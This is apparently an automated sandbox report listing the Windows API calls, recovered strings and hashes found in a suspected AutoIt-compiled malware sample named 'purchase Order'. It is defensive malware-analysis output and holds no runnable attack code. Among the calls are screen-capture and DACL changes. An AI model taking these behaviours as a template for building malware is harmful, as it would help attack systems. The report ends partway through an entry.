                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: 9f1ff22fd7f6fed05ac383b9c9a0ca2ec4fdff5b31fed1260f92a82c609b300e
                                                        • Instruction ID: f61d6656a280badf3db6cced2e336e09ef94e3f94c1e5057c9fba2d429e661b5
                                                        • Opcode Fuzzy Hash: 9f1ff22fd7f6fed05ac383b9c9a0ca2ec4fdff5b31fed1260f92a82c609b300e
                                                        • Instruction Fuzzy Hash: 603136B0D0831A6ADF109FB68C8995FBFE8FF04750F50453AE50DE7280DA78A5008FA5
                                                        APIs
                                                          • Part of subcall function 00C5E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C4C8B7,?,00002000,?,?,00000000,?,00C4419E,?,?,?,00CDDC00), ref: 00C5E984
                                                          • Part of subcall function 00C4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C453B1,?,?,00C461FF,?,00000000,00000001,00000000), ref: 00C4662F
                                                        • __wsplitpath.LIBCMT ref: 00C4C93E
                                                          • Part of subcall function 00C61DFC: __wsplitpath_helper.LIBCMT ref: 00C61E3C
                                                        • _wcscpy.LIBCMT ref: 00C4C953
                                                        • _wcscat.LIBCMT ref: 00C4C968
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C4C978
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C4CABE
                                                          • Part of subcall function 00C4B337: _wcscpy.LIBCMT ref: 00C4B36F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 2258743419-1018226102
                                                        • Opcode ID: 9201631ebb6ae38a03e1588b646a62b82dd1832df021b6c69043e449965ebff2
                                                        • Instruction ID: c79f21ff4b654e3fee9bc34d04e4ff4c6d301a2dd6e04031f54b283eafb23057
                                                        • Opcode Fuzzy Hash: 9201631ebb6ae38a03e1588b646a62b82dd1832df021b6c69043e449965ebff2
                                                        • Instruction Fuzzy Hash: 49129E715083419FC724EF24C881AAFBBE5FF99304F44492EF59A93261DB30DA49EB52
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00CA71FC
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA7247
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: @U=u$CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-383632319
                                                        • Opcode ID: ea3bac4644b5946f7fae2d9d1f711dc25c82f2b3bbc4031d03523c19b6353d27
                                                        • Instruction ID: e4e8a214ebcdb70fafca28233cbd8e784573706b21ec6ac812460a3233f91d43
                                                        • Opcode Fuzzy Hash: ea3bac4644b5946f7fae2d9d1f711dc25c82f2b3bbc4031d03523c19b6353d27
                                                        • Instruction Fuzzy Hash: 669172742047129BCB14EF10C891A6EB7A1BF95314F00895DFD965B3A3DB30EE4AEB85
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CAE5AB
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00CA9808,?), ref: 00CAE607
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CAE647
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CAE68C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CAE6C3
                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,00CA9808,?), ref: 00CAE6CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CAE6DF
                                                        • DestroyIcon.USER32(?), ref: 00CAE6EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CAE70B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CAE717
                                                          • Part of subcall function 00C60FA7: __wcsicmp_l.LIBCMT ref: 00C61030
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl$@U=u
                                                        • API String ID: 1212759294-1639919054
                                                        • Opcode ID: c3c5bc36cdbe6e1c55d6c4d6b8da2a49dd805886566181e74b19ec69bd7906ae
                                                        • Instruction ID: 94e8b75fe73f6ede9158367ef90fc138fbb046f7d4cb9c9e001bcc73212ead14
                                                        • Opcode Fuzzy Hash: c3c5bc36cdbe6e1c55d6c4d6b8da2a49dd805886566181e74b19ec69bd7906ae
                                                        • Instruction Fuzzy Hash: 8961D47150061AFBEB24DF64CC86FFE77A8BB15714F104515F915E60D1EB709A80D7A0
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 00C8AB3D
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00C8AB46
                                                        • VariantClear.OLEAUT32(?), ref: 00C8AB52
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C8AC40
                                                        • __swprintf.LIBCMT ref: 00C8AC70
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00C8AC9C
                                                        • VariantInit.OLEAUT32(?), ref: 00C8AD4D
                                                        • SysFreeString.OLEAUT32(00000016), ref: 00C8ADDF
                                                        • VariantClear.OLEAUT32(?), ref: 00C8AE35
                                                        • VariantClear.OLEAUT32(?), ref: 00C8AE44
                                                        • VariantInit.OLEAUT32(00000000), ref: 00C8AE80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 3730832054-3931177956
                                                        • Opcode ID: 0760bc842a86c585b334579433c15ef06e0a4253e608c96802ef56d9f715686f
                                                        • Instruction ID: 9b374125bffaa9b862852cd8133155091ea8c788a7f63d7b3039d3383fe6c891
                                                        • Opcode Fuzzy Hash: 0760bc842a86c585b334579433c15ef06e0a4253e608c96802ef56d9f715686f
                                                        • Instruction Fuzzy Hash: FBD11331600205EBEB24BF66C884B7EB7B5FF04704F14846BE5159B190DB70ED50EBAA
                                                        APIs
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                        • CharLowerBuffW.USER32(?,?), ref: 00C8D292
                                                        • GetDriveTypeW.KERNEL32 ref: 00C8D2DF
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8D327
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8D35E
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C8D38C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 1148790751-4113822522
                                                        • Opcode ID: 0322f039de5d06acef29d33e37aafe12e0c7482a1831c03964e2466bf1117094
                                                        • Instruction ID: fdd77e73ca77ff2c453e16560a8f3412e942b1041a86ed8a28117285238d63b9
                                                        • Opcode Fuzzy Hash: 0322f039de5d06acef29d33e37aafe12e0c7482a1831c03964e2466bf1117094
                                                        • Instruction Fuzzy Hash: BE512871104645AFC700EF21C88196EB7F4FF99758F00486DF896A72A1DB31EE0ADB52
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00CB3973,00000016,0000138C,00000016,?,00000016,00CDDDB4,00000000,?), ref: 00C826F1
                                                        • LoadStringW.USER32(00000000,?,00CB3973,00000016), ref: 00C826FA
                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00CB3973,00000016,0000138C,00000016,?,00000016,00CDDDB4,00000000,?,00000016), ref: 00C8271C
                                                        • LoadStringW.USER32(00000000,?,00CB3973,00000016), ref: 00C8271F
                                                        • __swprintf.LIBCMT ref: 00C8276F
                                                        • __swprintf.LIBCMT ref: 00C82780
                                                        • _wprintf.LIBCMT ref: 00C82829
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C82840
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 618562835-2268648507
                                                        • Opcode ID: a8aa5af630cf5cb0710c7190f87f8a45515ea42af346ceb1d4d02c8522c374df
                                                        • Instruction ID: 3072d838ac7e4fa373f1edcfcea61d9d234a9fe77c27b8d6bd1919a058653706
                                                        • Opcode Fuzzy Hash: a8aa5af630cf5cb0710c7190f87f8a45515ea42af346ceb1d4d02c8522c374df
                                                        • Instruction Fuzzy Hash: 13410E72800259BBCF14FBD0DD86EEEB778BF15344F100065B606760A2EA746F59EB61
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C8D0D8
                                                        • __swprintf.LIBCMT ref: 00C8D0FA
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C8D137
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C8D15C
                                                        • _memset.LIBCMT ref: 00C8D17B
                                                        • _wcsncpy.LIBCMT ref: 00C8D1B7
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C8D1EC
                                                        • CloseHandle.KERNEL32(00000000), ref: 00C8D1F7
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00C8D200
                                                        • CloseHandle.KERNEL32(00000000), ref: 00C8D20A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: 06ab2daf028fd51385445a758c2712179c7cecf167412e8f9dfeb48ada70f6f8
                                                        • Instruction ID: a05f00bbed2109990b484601fc0a9b626b54720d54b364430460d5bb67d5d8ad
                                                        • Opcode Fuzzy Hash: 06ab2daf028fd51385445a758c2712179c7cecf167412e8f9dfeb48ada70f6f8
                                                        • Instruction Fuzzy Hash: 2D3192B2500109ABDB21EFA0DC49FEF77BDAF89744F1040B5F51AD21A0E7709B458B24
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 00C9076F
                                                        • _wcscat.LIBCMT ref: 00C90787
                                                        • _wcscat.LIBCMT ref: 00C90799
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C907AE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C907C2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00C907DA
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C907F4
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C90806
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: 0c5093b2e6a9caa9199590dc10444c5e5507303fb67b1c605dedb9b324992533
                                                        • Instruction ID: f0d034b4571a68cd021c64c2eba326e900a113c8490e8138d14ea00cf099d8b6
                                                        • Opcode Fuzzy Hash: 0c5093b2e6a9caa9199590dc10444c5e5507303fb67b1c605dedb9b324992533
                                                        • Instruction Fuzzy Hash: A98190716043419FCF24DF24C84996EB7E8BF89314F28882EF995D7251E730EA55CB92
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CAEF3B
                                                        • GetFocus.USER32 ref: 00CAEF4B
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00CAEF56
                                                        • _memset.LIBCMT ref: 00CAF081
                                                        • GetMenuItemInfoW.USER32 ref: 00CAF0AC
                                                        • GetMenuItemCount.USER32(00000000), ref: 00CAF0CC
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00CAF0DF
                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CAF113
                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CAF15B
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CAF193
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CAF1C8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 8fcf8e1c67282833454651c14d1c17048a8d8be1ac7d0e0ebede9d4e8bd31a9a
                                                        • Instruction ID: cafe822baee8a77d8cd79eaaf370a88f93ab9945de1c778edfe6d21cef0f36db
                                                        • Opcode Fuzzy Hash: 8fcf8e1c67282833454651c14d1c17048a8d8be1ac7d0e0ebede9d4e8bd31a9a
                                                        • Instruction Fuzzy Hash: 10817C71104302AFD720CF54CC84A6FBBE8FB89318F00492DFAA997291D771D906DBA2
                                                        APIs
                                                          • Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C7ABD7
                                                          • Part of subcall function 00C7ABBB: GetLastError.KERNEL32(?,00C7A69F,?,?,?), ref: 00C7ABE1
                                                          • Part of subcall function 00C7ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00C7A69F,?,?,?), ref: 00C7ABF0
                                                          • Part of subcall function 00C7ABBB: HeapAlloc.KERNEL32(00000000,?,00C7A69F,?,?,?), ref: 00C7ABF7
                                                          • Part of subcall function 00C7ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C7AC0E
                                                          • Part of subcall function 00C7AC56: GetProcessHeap.KERNEL32(00000008,00C7A6B5,00000000,00000000,?,00C7A6B5,?), ref: 00C7AC62
                                                          • Part of subcall function 00C7AC56: HeapAlloc.KERNEL32(00000000,?,00C7A6B5,?), ref: 00C7AC69
                                                          • Part of subcall function 00C7AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C7A6B5,?), ref: 00C7AC7A
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C7A8CB
                                                        • _memset.LIBCMT ref: 00C7A8E0
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C7A8FF
                                                        • GetLengthSid.ADVAPI32(?), ref: 00C7A910
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00C7A94D
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C7A969
                                                        • GetLengthSid.ADVAPI32(?), ref: 00C7A986
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C7A995
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C7A99C
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C7A9BD
                                                        • CopySid.ADVAPI32(00000000), ref: 00C7A9C4
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C7A9F5
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C7AA1B
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C7AA2F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: c92ce80cc387523d9bf418cd7510dfc0ee9a6e3aed215ba6757ca21284a957ab
                                                        • Instruction ID: 269407ccd6e4705f375e189f922396bfbeb8728700dd6d7a4f6d8997db8ced1d
                                                        • Opcode Fuzzy Hash: c92ce80cc387523d9bf418cd7510dfc0ee9a6e3aed215ba6757ca21284a957ab
                                                        • Instruction Fuzzy Hash: 89513971900209ABDF10DF94DD85EEEBBB9FF44310F04C129F92AA6290DB359A16DB61
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00C99E36
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C99E42
                                                        • CreateCompatibleDC.GDI32(?), ref: 00C99E4E
                                                        • SelectObject.GDI32(00000000,?), ref: 00C99E5B
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C99EAF
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00C99EEB
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C99F0F
                                                        • SelectObject.GDI32(00000006,?), ref: 00C99F17
                                                        • DeleteObject.GDI32(?), ref: 00C99F20
                                                        • DeleteDC.GDI32(00000006), ref: 00C99F27
                                                        • ReleaseDC.USER32(00000000,?), ref: 00C99F32
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: c707d8880cf7eea2912ea0807a74ef85888a70ec872cf5aa74eda5f627f072ca
                                                        • Instruction ID: 94d164e3aea6a3e11a7235f0ba4076741b2e5ea5207fd799f893e9d219dc1dbf
                                                        • Opcode Fuzzy Hash: c707d8880cf7eea2912ea0807a74ef85888a70ec872cf5aa74eda5f627f072ca
                                                        • Instruction Fuzzy Hash: CD512976900309AFCB15CFA9C889FAEBBB9EF48710F14842DF95A97250D731A941CB54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 2889450990-2391861430
                                                        • Opcode ID: 9ab14e0ae197b3e2a15fc9da21fd6000e73c9af7806cd01e06f7b57b0804e758
                                                        • Instruction ID: 8dd23c9b6a8862d907ec0c459b04c9bd80eb23d91d447354cc2f9d3a2a52c90f
                                                        • Opcode Fuzzy Hash: 9ab14e0ae197b3e2a15fc9da21fd6000e73c9af7806cd01e06f7b57b0804e758
                                                        • Instruction Fuzzy Hash: 83515C72900249BBCB15FBA0CD86EEEB778BF08344F104166F515721A2EB316F59EB61
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
